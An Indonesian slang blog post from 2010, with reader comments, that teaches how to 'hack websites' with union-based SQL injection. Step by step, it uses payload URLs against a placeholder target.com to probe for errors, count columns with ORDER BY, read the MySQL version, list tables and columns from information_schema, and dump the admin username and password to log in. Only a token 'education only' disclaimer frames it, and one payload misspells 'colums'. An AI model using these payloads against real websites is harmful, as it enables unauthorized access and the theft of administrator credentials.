Tuesday, February 2, 2010

Nghack Website Pake SQL Injection

Postingan ini gw Bikin Untuk salah satu temen kampuz Sekaligus temen Blogger gw MUSA. Kayanya banyak banget ReQuest ye (udah kaya Dahsyat sama Inbox aja) padahal enakan Posting freeware kan gw ga usah pake nyoba dulu hha….Tapi ywdh lah gw Posting mumpung ada waktu (belaga Sibuk).

Waktu itu gw ga Ngeh paz dia Bilang SQL-SQL, gw kira itu software atau database apaan. Tapi paz kemaren gw gy mikir-mikir(SoQ Bener) muncul tuch di otaQ gw SQL Injection N paz gw inget kata dia itu buat Nghack Website…hahaha berarti bener yang dimaksud sama dia ini, makanya gw posting Khusus buat dia.


Pendahuluan Dulu ya biar asiQ ( Kaya Bikin Makalah Aja hhe)

Apa Sih TuCh SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.

Udah dah ga Usah pake lama-lama pendahuluannya hhe….

Kalo mau tau pengertian yang lebih jelas Lu Cari aja Di Search Engine (Google,Yahoo, Bing, Cuil Or etc)

1. Pertama kali yang kita lakukan tentu mencari target, ya iya lah klo ga ada yang mau di Hack mah percuma. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hahaha...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah Lu aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah Lu cobain satu - satu...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (tambah malez)
http://www.target.com/berita.php?id=100+order+by+5/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus Lu Liat angka berapa yang keluar (Jadi kaya Togel ye nunggu angka hahaha)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah, katanya yang ngajarin gw sih kalo buat Ngeliat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gw ga’ pake keliatan kok tabelnya...Apa gw salah? Mungkin tapi belum tentu juga hhe Cuz mank suka-suka gw kan hahaha

Lanjut, Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ‘N passwordnya...Abiz itu tinggal login aja dah...Cari-cari yang Lu anggap asiQ buat dimainin...Truz terserah Lu aja dah mau diapain asal jangan Ngelanggar Undang-Undang ITE hhe...( Cuz Kita kan White Hat yang taat pemerintah N Cuma Buat Edukasi Doank )


Oiya kaya biasa gw ga tanggung kalo ada apa-apa hhee….

Bukannya Lepas tanggung jawab nie, tapi kan Lu sendiri udah pada gede jadi gw anggap Lu Smua udah tau yang baik sama yang nggak. So, Klo Lu anggap ga baik ya jangan Dicoba….Iya Ga??? Paztinya… atau kalo Lu mau Coba juga ya jangan diapa-apain tuch Web targetnya kalo Lu udah dapet Username ‘N Passwordnya.


Okeh Sekian N’ terima kasih (Kaya Pidato aja gw hahaha)….

Pokoknya Happy Blogging Aja dah buat Smua………


Thnx To: Jasakom, Brother Cruzen, N My Community (*****Hacker And ****Hacker).

Dedicated To: Musa, All Visitor Of DJ-Site…..


10 comments:

  1. wow,, ati2 masuk penjara loohh hahah... :p

    ReplyDelete
  2. hohohoho
    ada Mr. Hacker disini...

    hiiiii.......... ngeri cabut akh...~
    bole aja ng-HACK
    tp asal jangan diriku yg imud ini yg jadi korban
    >_<'

    ReplyDelete
  3. Muantep banget boss tulisannya.. (walaupun belum mudeng.. wakakaka..)
    nggak papa.. yang penting jadi tau + lebih hati2 biar kita gak kena hack.. :)

    ReplyDelete
  4. hahhah sql injection ya da lama denger nama ini tapi saya g suka ngehack kang jadi males belajarnya..hehehehheheh..
    salam kenel

    ReplyDelete
  5. wakakakaka...gud...gud....
    asya suka ini..

    ReplyDelete
  6. Wah trik bagus sob..!! keep blogging!!

    ReplyDelete
  7. hebat fren. cara menghindarinya gimana fren.????

    ReplyDelete
  8. @Yusako: hhe makanya kan gw bilang jangan ini cuma edukasi hhe

    @Hitsuka: Eum bukan mas Cuma member KOmunitas Hacker hhe sama aja ya hha...

    @piet Puu: nda Mungkin lah Qu Nghack punya Qmu hhe...

    @ary Cah Kebumen: Dari ga mudeng kan lama2 mudeng mas hhe....makasih udah Support N Ninggalin KOment


    @Kang Tejo: Haha sebenernya gw juga malez kang, berhubung ada ReQuest aja kLo ga mah mending Posting Freeware hhe..

    @Benjoe: Thnx Kwan Udah ikutan KOment...

    @Akhtam: Thnx Sob...

    @Gambutku: Makasih Sob, Sebener'y C ga masalah juga Sob kLo cara yg Ini Cuz ini cuma buat web yg database'y pake SQL toQ, kaLO pake Blog yg gratisan kaya Blogger C ga mungkin kena Cuz blogger kan pake html bukan php hhe....
    Gy juga Sob kLo yg Selama ini gw ketemu C kLo blog paling D'hack'y pake LOgin Palsu DOank N itu juga paling yg Nghack Cuma Ngincer E-mail N Pass'y andai ad yg pake adsense aj buat Ngambil Acount adsense Google'y....
    tapi jarang C yg mau Nghack blog....hhe
    jadi aman2 aja....keep Blogging...

    ReplyDelete
  9. pelajaran berharga nih sob.. kapan2 dicoba ahhh.. hehehe


    http://mangkasarakku.blogspot.com/

    ReplyDelete